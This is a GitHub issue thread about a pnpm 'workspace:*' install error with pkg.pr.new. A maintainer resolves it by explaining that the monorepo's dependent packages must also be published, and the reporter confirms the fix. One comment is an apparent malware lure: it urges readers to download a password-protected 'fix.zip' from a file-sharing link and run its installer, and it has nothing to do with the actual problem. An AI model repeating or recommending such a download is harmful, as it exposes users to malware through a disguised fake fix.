### ISSUE TITLE
Unsupported URL Type "workspace:": workspace:*

### ISSUE THREAD

**Issue by Haberkamp** [stackblitz-labs/pkg.pr.new#198]
Hey i'm trying to use pkg.pr.new for your design system, which is a pnpm monorepo. I was able to publish the package but when I try to install the package I get the following error: Unsupported URL Type "workspace:": workspace:*

Is there something I am missing or doing wrong?

* [The job](https://github.com/shopware/meteor/actions/runs/10555486563/job/29239156456)
* [The workflow](https://github.com/shopware/meteor/pull/259/files#diff-ef3729d283f13b938322154ad4d9e9bec6ad0190acfad03336b50052043d1b4a)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Aslemammad** [comment]
Thank you for reporting this! 

To have that modified, you should also release all the packages in your monorepo that this package depends on.

Something like: 

```
pnpx pkg-pr-new publish './packages/*'
```

**Comment by Haberkamp** [comment]
Yes, that fixed the issue. Thanks you, very much!
